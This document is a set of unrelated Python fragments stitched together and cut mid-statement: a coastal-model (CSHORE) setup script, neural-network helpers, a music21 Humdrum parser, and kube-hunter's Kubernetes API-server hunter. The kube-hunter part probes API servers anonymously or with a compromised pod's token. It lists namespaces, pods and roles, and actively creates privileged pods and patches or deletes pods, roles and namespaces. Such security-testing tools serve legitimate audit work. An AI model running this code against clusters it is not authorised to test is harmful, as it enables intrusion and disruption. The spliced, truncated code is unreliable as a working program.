THIS MAY NOT BE THE SAME AS THE ONE IN INPUT DICT
i.e., if it is looping over a bunch of 24 hour simulations
that is also why it is a separate variable
inputDict (dict): input dictionary with keys
simulationDuration - duration of each simulation in hours
version_prefix - right now we have FIXED, MOBILE, and MOBILE_RESET
profileNumber - this is either the survey profile number or the alongshore location for the integrated bathy
bathyLoc - where are we getting our bathy data (surveys or integrated bathy)
workingDirectory - location where the user wants the data and model output
"""
# pull the stuff I need out of the dict
timerun = inputDict['simulationDuration']
version_prefix = inputDict['version_prefix']
profile_num = inputDict['profileNumber']
bathy_loc = inputDict['bathyLoc']
workingDir = inputDict['workingDirectory']
if 'THREDDS' in inputDict:
server = inputDict['THREDDS']
else:
print('Choosing CHL thredds by default, this may be slower!')
server = 'CHL'
# ____________________GENERAL ASSUMPTION VARIABLES__________
model = 'CSHORE'
path_prefix = os.path.join(workingDir, model, '%s/' % version_prefix)
time_step = 1 # time step for model in hours
dx = 1 # cross-shore grid spacing (FRF coord units - m)
fric_fac = 0.015
# ______________________________________________________________________________
# _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
# Time Stuff!
if type(timerun) == str:
timerun = int(timerun)
start_time = DT.datetime.strptime(startTime, '%Y-%m-%dT%H:%M:%SZ')
# scream at them if the simulation does not start on a whole hour!
assert start_time.minute == 0 and start_time.second == 0 and start_time.microsecond == 0, 'Your simulation must start on the hour!'
end_time = start_time + DT.timedelta(days=0, hours=timerun) # removed for ilab=1 , minutes=1)
date_str = start_time.strftime('%Y-%m-%dT%H%M%SZ')
# start making my metadata dict
meta_dict = {'startTime': startTime,
'timerun': timerun,
'time_step': time_step,
'dx': dx,
'fric_fac': fric_fac,
'version': version_prefix}
ftime = timerun * 3600 # [sec] final time, dictates model duration
dt = time_step * 3600 # time interval (sec) for wave and water level conditions
BC_dict = {'timebc_wave': np.arange(0, ftime + dt, dt)}
# ______________________________________________________________________________
# __________________Make Diretories_____________________________________________
if not os.path.exists(path_prefix + date_str): # if it doesn't exist
os.makedirs(path_prefix + date_str) # make the directory
if not os.path.exists(path_prefix + date_str + "/figures/"):
os.makedirs(path_prefix + date_str + "/figures/")
print "Model Time Start : %s Model Time End: %s" % (start_time, end_time)
print u"Files will be placed in {0} folder".format(path_prefix + date_str)
# decision time - fixed vs mobile
if version_prefix == 'FIXED':
# if it is fixed, first thing to do is get waves
## _____________WAVES____________________________
frf_Data = getObs(start_time, end_time + DT.timedelta(days=0, hours=0, minutes=1), THREDDS=server)
# Attempt to get 8m array first!!!
try:
wave_data = frf_Data.getWaveSpec(gaugenumber=12)
meta_dict['BC_gage'] = wave_data['name']
print "_________________\nGathering Wave Data from %s" % (wave_data['name'])
# check to see if I am missing my first and last points - if so then I can't interpolate
assert start_time in wave_data['time'] and end_time in wave_data['time'], 'Wave data are missing for simulation start time or end time!'
# if I am missing more than 1/4 of the data I should have, abort the run
assert len(wave_data['Hs']) > 0.75 * len(BC_dict['timebc_wave']), 'Missing more than 25% of wave data'
# get missing wave data if there is any!
date_list = np.array([start_time + DT.timedelta(hours=x) for x in range(0, timerun + 1)])
dum_var = [x not in wave_data['time'] for x in date_list]
if sum(dum_var) == 0:
meta_dict['blank_wave_data'] = np.nan
else:
meta_dict['blank_wave_data'] = date_list[np.argwhere( dum_var).flatten()] # this will list all the times that wave data should exist, but doesn't
print "%d wave records with %d interpolated points" % (np.shape(wave_data['dWED'])[0], timerun + 1 - len(wave_data['dWED']))
helper = | |
import logging
import json
import uuid
import requests
from kube_hunter.conf import get_config
from kube_hunter.modules.discovery.apiserver import ApiServer
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster
from kube_hunter.core.types import (
AccessRisk,
InformationDisclosure,
UnauthenticatedAccess,
)
logger = logging.getLogger(__name__)
class ServerApiAccess(Vulnerability, Event):
"""The API Server port is accessible.
Depending on your RBAC settings this could expose access to or control of your cluster."""
def __init__(self, evidence, using_token):
if using_token:
name = "Access to API using service account token"
category = InformationDisclosure
else:
name = "Unauthenticated access to API"
category = UnauthenticatedAccess
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV005",
)
self.evidence = evidence
class ServerApiHTTPAccess(Vulnerability, Event):
"""The API Server port is accessible over HTTP, and therefore unencrypted.
Depending on your RBAC settings this could expose access to or control of your cluster."""
def __init__(self, evidence):
name = "Insecure (HTTP) access to API"
category = UnauthenticatedAccess
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV006",
)
self.evidence = evidence
class ApiInfoDisclosure(Vulnerability, Event):
def __init__(self, evidence, using_token, name):
if using_token:
name += " using service account token"
else:
name += " as anonymous user"
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=InformationDisclosure,
vid="KHV007",
)
self.evidence = evidence
class ListPodsAndNamespaces(ApiInfoDisclosure):
""" Accessing pods might give an attacker valuable information"""
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing pods")
class ListNamespaces(ApiInfoDisclosure):
""" Accessing namespaces might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing namespaces")
class ListRoles(ApiInfoDisclosure):
""" Accessing roles might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing roles")
class ListClusterRoles(ApiInfoDisclosure):
""" Accessing cluster roles might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing cluster roles")
class CreateANamespace(Vulnerability, Event):
"""Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created a namespace",
category=AccessRisk,
)
self.evidence = evidence
class DeleteANamespace(Vulnerability, Event):
""" Deleting a namespace might give an attacker the option to affect application behavior """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Delete a namespace",
category=AccessRisk,
)
self.evidence = evidence
class CreateARole(Vulnerability, Event):
"""Creating a role might give an attacker the option to harm the normal behavior of newly created pods
within the specified namespaces.
"""
def __init__(self, evidence):
Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=AccessRisk)
self.evidence = evidence
class CreateAClusterRole(Vulnerability, Event):
"""Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
across the whole cluster
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class PatchARole(Vulnerability, Event):
"""Patching a role might give an attacker the option to create new pods with custom roles within the
specific role's namespace scope
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched a role",
category=AccessRisk,
)
self.evidence = evidence
class PatchAClusterRole(Vulnerability, Event):
"""Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
cluster scope.
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class DeleteARole(Vulnerability, Event):
""" Deleting a role might allow an attacker to affect access to resources in the namespace"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted a role",
category=AccessRisk,
)
self.evidence = evidence
class DeleteAClusterRole(Vulnerability, Event):
""" Deleting a cluster role might allow an attacker to affect access to resources in the cluster"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class CreateAPod(Vulnerability, Event):
""" Creating a new pod allows an attacker to run custom code"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created A Pod",
category=AccessRisk,
)
self.evidence = evidence
class CreateAPrivilegedPod(Vulnerability, Event):
""" Creating a new PRIVILEGED pod would gain an attacker FULL CONTROL over the cluster"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created A PRIVILEGED Pod",
category=AccessRisk,
)
self.evidence = evidence
class PatchAPod(Vulnerability, Event):
""" Patching a pod allows an attacker to compromise and control it """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched A Pod",
category=AccessRisk,
)
self.evidence = evidence
class DeleteAPod(Vulnerability, Event):
""" Deleting a pod allows an attacker to disturb applications on the cluster """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted A Pod",
category=AccessRisk,
)
self.evidence = evidence
class ApiServerPassiveHunterFinished(Event):
def __init__(self, namespaces):
self.namespaces = namespaces
# This Hunter checks what happens if we try to access the API Server without a service account token
# If we have a service account token we'll also trigger AccessApiServerWithToken below
@handler.subscribe(ApiServer)
class AccessApiServer(Hunter):
"""API Server Hunter
Checks if API server is accessible
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
self.headers = {}
self.with_token = False
def access_api_server(self):
config = get_config()
logger.debug(f"Passive Hunter is attempting to access the API at {self.path}")
try:
r = requests.get(f"{self.path}/api", headers=self.headers, verify=False, timeout=config.network_timeout)
if r.status_code == 200 and r.content:
return r.content
except requests.exceptions.ConnectionError:
pass
return False
def get_items(self, path):
config = get_config()
try:
items = []
r = requests.get(path, headers=self.headers, verify=False, timeout=config.network_timeout)
if r.status_code == 200:
resp = json.loads(r.content)
for item in resp["items"]:
items.append(item["metadata"]["name"])
return items
logger.debug(f"Got HTTP {r.status_code} response: {r.text}")
except (requests.exceptions.ConnectionError, KeyError):
logger.debug(f"Failed retrieving items from API server at {path}")
return None
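`get_items` relies on the shape every Kubernetes list endpoint shares: a JSON object with an `items` array whose entries carry `metadata.name`. A self-contained sketch with a hand-written stand-in response:

```python
import json

# Minimal stand-in for a Kubernetes list response (e.g. GET /api/v1/namespaces).
raw = '{"items": [{"metadata": {"name": "default"}}, {"metadata": {"name": "kube-system"}}]}'
resp = json.loads(raw)

# Same extraction the hunter performs on a 200 response.
names = [item["metadata"]["name"] for item in resp["items"]]
print(names)  # → ['default', 'kube-system']
```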
def get_pods(self, namespace=None):
config = get_config()
pods = []
try:
if not namespace:
r = requests.get(
f"{self.path}/api/v1/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
else:
r = requests.get(
f"{self.path}/api/v1/namespaces/{namespace}/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
if r.status_code == 200:
resp = json.loads(r.content)
for item in resp["items"]:
name = item["metadata"]["name"].encode("ascii", "ignore")
namespace = item["metadata"]["namespace"].encode("ascii", "ignore")
pods.append({"name": name, "namespace": namespace})
return pods
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def execute(self):
api = self.access_api_server()
if api:
if self.event.protocol == "http":
self.publish_event(ServerApiHTTPAccess(api))
else:
self.publish_event(ServerApiAccess(api, self.with_token))
namespaces = self.get_items(f"{self.path}/api/v1/namespaces")
if namespaces:
self.publish_event(ListNamespaces(namespaces, self.with_token))
roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/roles")
if roles:
self.publish_event(ListRoles(roles, self.with_token))
cluster_roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles")
if cluster_roles:
self.publish_event(ListClusterRoles(cluster_roles, self.with_token))
pods = self.get_pods()
if pods:
self.publish_event(ListPodsAndNamespaces(pods, self.with_token))
# If we have a service account token, this event should get triggered twice - once with and once without
# the token
self.publish_event(ApiServerPassiveHunterFinished(namespaces))
@handler.subscribe(ApiServer, predicate=lambda x: x.auth_token)
class AccessApiServerWithToken(AccessApiServer):
"""API Server Hunter
Accessing the API server using the service account token obtained from a compromised pod
"""
def __init__(self, event):
super(AccessApiServerWithToken, self).__init__(event)
assert self.event.auth_token
self.headers = {"Authorization": f"Bearer {self.event.auth_token}"}
self.category = InformationDisclosure
self.with_token = True
# Active Hunter
@handler.subscribe(ApiServerPassiveHunterFinished)
class AccessApiServerActive(ActiveHunter):
"""API server hunter
Accessing the api server might grant an attacker full control over the cluster
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
def create_item(self, path, data):
config = get_config()
headers = {"Content-Type": "application/json"}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.post(path, verify=False, data=data, headers=headers, timeout=config.network_timeout)
if res.status_code in [200, 201, 202]:
parsed_content = json.loads(res.content)
return parsed_content["metadata"]["name"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def patch_item(self, path, data):
config = get_config()
headers = {"Content-Type": "application/json-patch+json"}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.patch(path, headers=headers, verify=False, data=data, timeout=config.network_timeout)
if res.status_code not in [200, 201, 202]:
return None
parsed_content = json.loads(res.content)
# TODO is there a patch timestamp we could use?
return parsed_content["metadata"]["namespace"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def delete_item(self, path):
config = get_config()
headers = {}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.delete(path, headers=headers, verify=False, timeout=config.network_timeout)
if res.status_code in [200, 201, 202]:
parsed_content = json.loads(res.content)
return parsed_content["metadata"]["deletionTimestamp"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def create_a_pod(self, namespace, is_privileged):
privileged_value = {"securityContext": {"privileged": True}} if is_privileged else {}
random_name = str(uuid.uuid4())[0:5]
pod = {
"apiVersion": "v1",
"kind": "Pod",
"metadata": {"name": random_name},
"spec": {
"containers": [
{"name": random_name, "image": "nginx:1.7.9", "ports": [{"containerPort": 80}], **privileged_value}
]
},
}
return self.create_item(path=f"{self.path}/api/v1/namespaces/{namespace}/pods", data=json.dumps(pod))
def delete_a_pod(self, namespace, pod_name):
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}")
if not delete_timestamp:
logger.error(f"Created pod {pod_name} in namespace {namespace} but unable to delete it")
return delete_timestamp
def patch_a_pod(self, namespace, pod_name):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}",
data=json.dumps(data),
)
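`patch_a_pod` sends an RFC 6902 JSON Patch document with a single `add` operation. A minimal, hypothetical applier for just that one top-level `add` op, using plain dicts (a real API server implements the full RFC 6902 semantics, including nested paths):

```python
import json

def apply_add_op(resource, op):
    # toy applier: only handles a top-level "add" like {"op": "add", "path": "/hello", ...}
    assert op["op"] == "add" and op["path"].count("/") == 1
    patched = dict(resource)
    patched[op["path"].lstrip("/")] = op["value"]
    return patched

pod = {"metadata": {"name": "demo"}}
patch = [{"op": "add", "path": "/hello", "value": ["world"]}]
print(json.dumps(apply_add_op(pod, patch[0]), sort_keys=True))
```

The `Content-Type: application/json-patch+json` header above is what tells the API server to interpret the body as this operation list rather than a merge patch.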
def create_namespace(self):
random_name = (str(uuid.uuid4()))[0:5]
data = {
"kind": "Namespace",
"apiVersion": "v1",
"metadata": {"name": random_name, "labels": {"name": random_name}},
}
return self.create_item(path=f"{self.path}/api/v1/namespaces", data=json.dumps(data))
def delete_namespace(self, namespace):
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}")
if delete_timestamp is None:
logger.error(f"Created namespace {namespace} but failed to delete it")
return delete_timestamp
def create_a_role(self, namespace):
name = str(uuid.uuid4())[0:5]
role = {
"kind": "Role",
"""
mathEX.py
@author: <NAME>
@email: <EMAIL>
Math-related functions, extensions.
"""
import numpy as np
def change_to_multi_class(label_set, num_of_labels):
"""
change the input prediction y to array-wise multi_class classifiers.
:param label_set:input prediction y, numpy arrays
:param num_of_labels: number of class we want to classify, ints
:return: array-wise multi_class classifiers
"""
number_of_samples = label_set.shape[1]
multi_class_y = np.zeros([num_of_labels, number_of_samples])
for i in range(number_of_samples):
label = label_set[0, i]
multi_class_y[int(label), i] = 1
return multi_class_y
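For example, three samples with classes 0, 2 and 1 become the columns of a one-hot matrix. The sketch below uses a vectorized equivalent of the loop above rather than the function itself, so it is self-contained:

```python
import numpy as np

def one_hot(label_set, num_of_labels):
    # vectorized equivalent of change_to_multi_class's loop
    m = label_set.shape[1]
    out = np.zeros((num_of_labels, m))
    out[label_set[0].astype(int), np.arange(m)] = 1
    return out

labels = np.array([[0, 2, 1]])   # shape (1, 3): three samples
print(one_hot(labels, 3))
```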
def compute_cost(training_result, label_set):
"""
compute costs between output results and actual results y. NEEDS TO BE MODIFIED.
:param training_result: output results, numpy arrays
:param label_set: actual result, numpy arrays
:return: cost, floats
"""
num_of_samples = label_set.shape[1]
# Compute loss from aL and y.
cost = sum(sum((1. / num_of_samples) * (-np.dot(label_set, np.log(training_result).T) - np.dot(1 - label_set, np.log(1 - training_result).T))))
cost = np.squeeze(cost)
assert (cost.shape == ())
return cost
def compute_cost_with_l2_regularization(training_result, label_set, parameters, lambd):
"""
compute costs with L2 regularization, uses the original cost function.
:param training_result: results AL, numpy arrays
:param label_set: actual results y, numpy arrays
:param parameters: parameters got from forward propagation, dictionaries
:param lambd: lambda for regularization, floats
:return: cost, floats
"""
num_of_samples = label_set.shape[1]
num_of_parameters = len(parameters) // 2
w_square_sum = 0
# adding up Ws
for i in range(num_of_parameters):
w_square_sum += np.sum(np.square(parameters['W'+str(i+1)]))
# compute regular costs
cross_entropy_cost = compute_cost(training_result, label_set)
# combine regular costs and regularization term
l2_regularization_cost = (lambd / (2 * num_of_samples)) * w_square_sum
cost = cross_entropy_cost + l2_regularization_cost
return cost
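The regularization term added above is lambd / (2m) times the sum of the squared Frobenius norms of every weight matrix. A small standalone numeric sketch of that term (not using the helpers above):

```python
import numpy as np

def l2_penalty(parameters, lambd, m):
    # lambd / (2m) * sum over layers of sum(W ** 2)
    w_square_sum = sum(np.sum(np.square(w))
                       for name, w in parameters.items() if name.startswith("W"))
    return (lambd / (2 * m)) * w_square_sum

params = {"W1": np.ones((2, 2)), "b1": np.zeros((2, 1)),
          "W2": np.full((1, 2), 2.0), "b2": np.zeros((1, 1))}
print(l2_penalty(params, lambd=0.1, m=4))   # (0.1 / 8) * (4 + 8) = 0.15
```

Note the `b` vectors are deliberately excluded; only the weights are penalized, matching the `'W' + str(i+1)` lookup in the function above.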
def initialize_parameters_deep_he(layer_dims):
"""
initialization for deep learning with HE random algorithm to prevent fading & exploding gradients.
:param layer_dims: dimensions of layers, lists
:return: initialized parameters
"""
np.random.seed(1)
parameters = {}
num_of_layers = len(layer_dims) # number of layers in the network
for l in range(1, num_of_layers):
        # initialize W with random values scaled by the He factor sqrt(2 / n_prev)
parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * np.sqrt(2 / layer_dims[l - 1])
parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))
assert (parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))
assert (parameters['b' + str(l)].shape == (layer_dims[l], 1))
return parameters
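Scaling each weight by sqrt(2 / n_prev) gives Var(W) close to 2 / n_prev, which is what keeps activation variance roughly stable across ReLU layers. A quick sketch checking that property empirically:

```python
import numpy as np

np.random.seed(0)
n_prev, n_curr = 400, 100
W = np.random.randn(n_curr, n_prev) * np.sqrt(2.0 / n_prev)
# the empirical variance should sit near the He target of 2 / n_prev = 0.005
print(W.var())
```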
"""
def initialize_parameters_deep(layer_dims):
np.random.seed(1)
parameters = {}
L = len(layer_dims) # number of layers in the network
for l in range(1, L):
parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1])
parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))
assert (parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))
assert (parameters['b' + str(l)].shape == (layer_dims[l], 1))
return parameters
"""
def l_model_forward(input_set, parameters):
"""
Forward propagation of deep learning.
:param input_set: input x, numpy arrays
:param parameters:
:return: output aL and caches for following calculations, numpy arrays and indexes
"""
caches = []
last_set = input_set
num_of_layers = len(parameters) // 2 # number of layers in the neural network
# Implement [LINEAR -> RELU]*(L-1). Add "cache" to the "caches" list.
for l in range(1, num_of_layers):
a_prev = last_set
        # use relu or leaky relu in hidden layers
last_set, cache = linear_activation_forward(a_prev, parameters['W' + str(l)], parameters['b' + str(l)],
activation="leaky_relu") #was relu
caches.append(cache)
# Implement LINEAR -> SIGMOID. Add "cache" to the "caches" list.
# output layer with sigmoid activation
training_result, cache = linear_activation_forward(last_set, parameters['W' + str(num_of_layers)], parameters['b' + str(num_of_layers)], activation="sigmoid")
caches.append(cache)
    assert (training_result.shape == (10, input_set.shape[1]))  # shape[0] must match the size of the output layer (10 classes here)
return training_result, caches
def L_model_backward_with_l2(training_result, label_set, caches, lambd):
"""
Backward propagation for deep learning with L2 regularization.
:param training_result: output AL, numpy arrays
:param label_set: actual answers y, numpy arrays
:param caches: caches from forward propagation, dictionaries
:param lambd: regularization parameter lambda, floats
    :return: gradients for gradient descent, dictionaries
"""
grads = {}
num_of_layers = len(caches) # the number of layers
num_of_samples = training_result.shape[1]
label_set = label_set.reshape(training_result.shape) # after this line, Y is the same shape as AL
# Initializing the back propagation
d_training_result = - (np.divide(label_set, training_result) - np.divide(1 - label_set, 1 - training_result))
# Lth layer Inputs: "AL, Y, caches". Outputs: "grads["dAL"], grads["dWL"], grads["dbL"]
current_cache = caches[num_of_layers - 1]
grads["dA" + str(num_of_layers - 1)], grads["dW" + str(num_of_layers)], grads["db" + str(num_of_layers)] = linear_activation_backward_with_l2(d_training_result, current_cache, lambd, activation="sigmoid")
for l in reversed(range(num_of_layers - 1)):
# lth layer: (RELU -> LINEAR) gradients.
current_cache = caches[l]
        # use relu or leaky relu for hidden layers
da_prev_temp, dw_temp, db_temp = linear_activation_backward_with_l2(grads["dA" + str(l + 1)], current_cache,
lambd, activation="leaky_relu")
grads["dA" + str(l)] = da_prev_temp
grads["dW" + str(l + 1)] = dw_temp
grads["db" + str(l + 1)] = db_temp
return grads
def linear_activation_backward_with_l2(d_current_set, cache, lambd, activation):
"""
activation step for backward propagation with multiple choices of activation function.
:param d_current_set: dA from last step of backward propagation, numpy arrays
:param cache: caches in deep learning, dictionaries
:param lambd: regularization parameter lambda, floats
:param activation: choice of activation, strings
:return: last dA, dW, db, numpy arrays
"""
linear_cache, activation_cache = cache
if activation == "relu":
d_z = relu_backward(d_current_set, activation_cache)
d_a_prev, d_w, d_b = linear_backward_with_l2(d_z, linear_cache, lambd)
elif activation == "sigmoid":
d_z = sigmoid_backward(d_current_set, activation_cache)
d_a_prev, d_w, d_b = linear_backward_with_l2(d_z, linear_cache, lambd)
elif activation == "leaky_relu":
d_z = leaky_relu_backward(d_current_set, activation_cache)
d_a_prev, d_w, d_b = linear_backward_with_l2(d_z, linear_cache, lambd)
    else:
        raise ValueError("unknown activation: " + activation)
    return d_a_prev, d_w, d_b
def linear_activation_forward(a_prev, parameter_w, parameter_b, activation):
"""
activation step for forward propagation with multiple choices of activation function.
:param a_prev: previous A from last step of forward propagation, numpy arrays
:param parameter_w: parameter W in current layer, numpy arrays
:param parameter_b: parameter b in current layer, numpy arrays
:param activation: choice of activation, strings
:return: current A and cache for following calculation
"""
if activation == "sigmoid":
# Inputs: "A_prev, W, b". Outputs: "A, activation_cache".
current_z, linear_cache = linear_forward(a_prev, parameter_w, parameter_b)
A, activation_cache = sigmoid(current_z)
elif activation == "relu":
# Inputs: "A_prev, W, b". Outputs: "A, activation_cache".
current_z, linear_cache = linear_forward(a_prev, parameter_w, parameter_b)
A, activation_cache = relu(current_z)
elif activation == "leaky_relu":
# Inputs: "A_prev, W, b". Outputs: "A, activation_cache".
current_z, linear_cache = linear_forward(a_prev, parameter_w, parameter_b)
A, activation_cache = leaky_relu(current_z)
    else:
        raise ValueError("unknown activation: " + activation)
    assert (A.shape == (parameter_w.shape[0], a_prev.shape[1]))
cache = (linear_cache, activation_cache)
return A, cache
def linear_backward_with_l2(d_z, cache, lambd):
"""
linear step in backward propagation.
:param d_z: current dZ, numpy arrays
:param cache: caches from previous calculation, dictionaries
:param lambd: regularization parameter lambda, floats
:return: previous dA, current dW, db, numpy arrays
"""
a_prev, w, b = cache
m = a_prev.shape[1]
d_w = 1. / m * np.dot(d_z, a_prev.T) + (lambd / m) * w
db = 1. / m * np.sum(d_z, axis=1, keepdims=True)
da_prev = np.dot(w.T, d_z)
# dA_prev = dropouts_backward(dA_prev, D, keep_prob)
assert (da_prev.shape == a_prev.shape)
assert (d_w.shape == w.shape)
assert (db.shape == b.shape)
return da_prev, d_w, db
def linear_forward(current_set, parameter_w, parameter_b):
"""
linear step for forward propagation
:param current_set: current A, numpy arrays
:param parameter_w: current parameter W, numpy arrays
:param parameter_b: current parameter b, numpy arrays
:return: current z, and caches for following calculations, numpy arrays and dictionaries
"""
current_z = parameter_w.dot(current_set) + parameter_b
assert (current_z.shape == (parameter_w.shape[0], current_set.shape[1]))
cache = (current_set, parameter_w, parameter_b)
return current_z, cache
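`linear_forward` computes Z = W·A + b, where b of shape (n_curr, 1) broadcasts across all m sample columns. A standalone shape sketch:

```python
import numpy as np

n_prev, n_curr, m = 3, 2, 5
A = np.ones((n_prev, m))            # activations from the previous layer
W = np.ones((n_curr, n_prev))
b = np.full((n_curr, 1), 0.5)
Z = W.dot(A) + b                    # b broadcasts over the m sample columns
print(Z.shape)                      # (2, 5)
```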
def one_vs_all_prediction(prob_matrix):
"""
Compare every probability, get the maximum and output the index.
:param prob_matrix: probability matrix, numpy arrays
:return: prediction generated from probability matrix, numpy arrays
"""
num_of_samples = prob_matrix.shape[1]
prediction = np.argmax(prob_matrix, axis=0)
prediction = np.array([prediction]) # keep dimensions
assert (prediction.shape == (1, num_of_samples))
return prediction
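The prediction step above is just a column-wise argmax over the class probabilities, re-wrapped so the result keeps the (1, m) shape. For example:

```python
import numpy as np

probs = np.array([[0.1, 0.7],
                  [0.8, 0.2],
                  [0.1, 0.1]])                     # 3 classes, 2 samples
prediction = np.array([np.argmax(probs, axis=0)])  # wrap to keep the (1, m) shape
print(prediction)                                  # [[1 0]]
```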
def relu(current_z):
"""
relu function
:param current_z: input A, numpy arrays or numbers
:return: output A, numpy arrays or numbers
"""
current_set = np.maximum(0, current_z)
assert (current_set.shape == current_z.shape)
cache = current_z
return current_set, cache
def relu_backward(d_current_set, cache):
"""
compute gradient of relu function.
:param d_current_set: input dA, numpy arrays or numbers
:param cache: caches with Z, dictionaries
:return: result dZ, numpy arrays or numbers
"""
current_z = cache
dz = np.array(d_current_set, copy=True) # just converting dz to a correct object.
    # when z <= 0, the relu gradient is 0, so set dz to 0 as well.
dz[current_z <= 0] = 0
assert (dz.shape == current_z.shape)
return dz
def leaky_relu(current_z):
"""
leaky relu function
:param current_z: input Z, numpy arrays or numbers
:return: result A and caches for following calculation
"""
current_set = np.maximum(0.01 * current_z, current_z)
assert (current_set.shape == current_z.shape)
cache = current_z
return current_set, cache
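Unlike plain relu, leaky relu keeps a 0.01 slope for negative inputs instead of clamping them to zero, which is what keeps gradients flowing through "dead" units. A quick standalone check of the same formula:

```python
import numpy as np

z = np.array([-2.0, 0.0, 3.0])
a = np.maximum(0.01 * z, z)    # same elementwise formula as leaky_relu above
print(a)
```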
def leaky_relu_backward(d_current_set, cache):
"""
compute | |
of lines (dataStream) to parse!')
self.parsePositionInStream = 0
self.eventList = []
for line in dataStream:
line = line.rstrip()
if line == "":
continue # technically forbidden by Humdrum but the source of so many errors!
elif re.match(r'\!\!\!', line):
self.eventList.append(GlobalReferenceLine(self.parsePositionInStream, line))
elif re.match(r'\!\!', line): ## find global comments at the top of the line
self.eventList.append(GlobalCommentLine(self.parsePositionInStream, line))
else:
thisLine = SpineLine(self.parsePositionInStream, line)
if thisLine.numSpines > self.maxSpines:
self.maxSpines = thisLine.numSpines
self.eventList.append(thisLine)
self.parsePositionInStream += 1
self.fileLength = self.parsePositionInStream
return self.eventList
def parseProtoSpinesAndEventCollections(self):
r'''
Run after :meth:`~music21.humdrum.spineParser.HumdrumDataCollection.parseEventListFromDataStream()`
to take self.eventList and slice it horizontally
to get self.eventCollections, which is a list of
EventCollection objects, or things that happen simultaneously.
And, more importantly, this method slices self.eventList
vertically to get self.protoSpines which is a list
of ProtoSpines, that is a vertical slice of everything that
happens in a column, regardless of spine-path indicators.
EventCollection objects store global events at the position.
ProtoSpines do not.
So self.eventCollections and self.protoSpines can each be
thought of as a two-dimensional sheet of cells, but where
the first index of the former is the vertical position in
        the dataStream and the first index of the latter is the
horizontal position in the dataStream. The contents of
each cell is a SpineEvent object or None (if there's no
data at that point). Even '.' (continuation events) get
translated into SpineEvent objects.
Calls :meth:`~music21.humdrum.spineParser.parseEventListFromDataStream`
if it hasn't already been called.
returns a tuple of protoSpines and eventCollections in addition to
setting it in the calling object.
>>> eventString = "!!!COM: Beethoven, Ludwig van\n" + \
... "!! Not really a piece by Beethoven\n" + \
... "**kern\t**dynam\n" + \
... "C4\tpp\n" + \
... "D8\t.\n"
>>> hdc = humdrum.spineParser.HumdrumDataCollection(eventString)
>>> protoSpines, eventCollections = hdc.parseProtoSpinesAndEventCollections()
>>> protoSpines is hdc.protoSpines
True
>>> eventCollections is hdc.eventCollections
True
Looking at individual slices is unlikely to tell you much.
>>> for thisSlice in eventCollections:
... print(thisSlice)
<music21.humdrum.spineParser.EventCollection object at 0x...>
<music21.humdrum.spineParser.EventCollection object at 0x...>
<music21.humdrum.spineParser.EventCollection object at 0x...>
<music21.humdrum.spineParser.EventCollection object at 0x...>
<music21.humdrum.spineParser.EventCollection object at 0x...>
